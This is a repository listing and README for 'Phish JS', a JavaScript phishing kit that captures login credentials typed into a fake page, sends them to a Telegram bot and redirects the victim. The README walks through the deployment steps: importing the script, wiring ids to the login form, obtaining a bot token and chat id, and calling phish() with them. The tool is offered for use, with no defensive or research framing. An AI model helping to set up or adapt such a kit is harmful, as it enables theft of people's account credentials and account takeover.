https://github.com/xbaysal11/phish-js
:tropical_fish: Phish JS - Universal phishing script with Telegram bot notification
https://github.com/xbaysal11/phish-js
facebook fish fishjs git hack hacking instagram js phishing phishing-attacks phishing-pages phishing-script phishing-sites phishjs script telegram telegram-bot telegram-bot-api
Last synced: 6 months ago
JSON representation
:tropical_fish: Phish JS - Universal phishing script with Telegram bot notification
- Host: GitHub
- URL: https://github.com/xbaysal11/phish-js
- Owner: xbaysal11
- License: mit
- Created: 2020-02-24T09:44:18.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2023-07-03T04:57:52.000Z (over 2 years ago)
- Last Synced: 2025-04-09T06:35:07.039Z (7 months ago)
- Topics: facebook, fish, fishjs, git, hack, hacking, instagram, js, phishing, phishing-attacks, phishing-pages, phishing-script, phishing-sites, phishjs, script, telegram, telegram-bot, telegram-bot-api
- Language: JavaScript
- Homepage: https://xbaysal11.github.io/phish-js/
- Size: 10.7 KB
- Stars: 52
- Watchers: 3
- Forks: 19
- Open Issues: 3
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
Phish JS
Universal phishing script + Telegram bot notification
[](https://github.com/xbaysal11/phish-js)
[](https://github.com/xbaysal11)
[](https://github.com/xbaysal11/phish-js)
---
# Documentation
## 1. Download files or clone
- [Download files](https://github.com/xbaysal11/phish-js/archive/master.zip).
## 2. Put "phish.min.js" file to your project
## 3. Import "phish.min.js"
```
```
## 4. Import "JQuery"
Via [CDN](https://code.jquery.com/) is the quickest and easiest way to get JQuery on your website.
```
```
## 5. Set ids to inputs and button
```
Login
```
## 6. Get TOKEN and CHAT_ID
- 1. Create bot with `@BotFather` and copy bot TOKEN
- 2. Open your bot and type `/start`
- 3. Get chat id here: `https://api.telegram.org/bot/getUpdates`
## 7. Call function
```
$(document).ready(function () {
const BOT_TOKEN = 'your_bot_token',
CHAT_ID = 'your_chat_id',
REDIRECT_URL = 'default_redirect_url'
phish(BOT_TOKEN, CHAT_ID, REDIRECT_URL);
});
```
---
### LICENSE
Phish JS is [MIT licensed.](https://github.com/xbaysal11/phish-js/blob/master/LICENSE)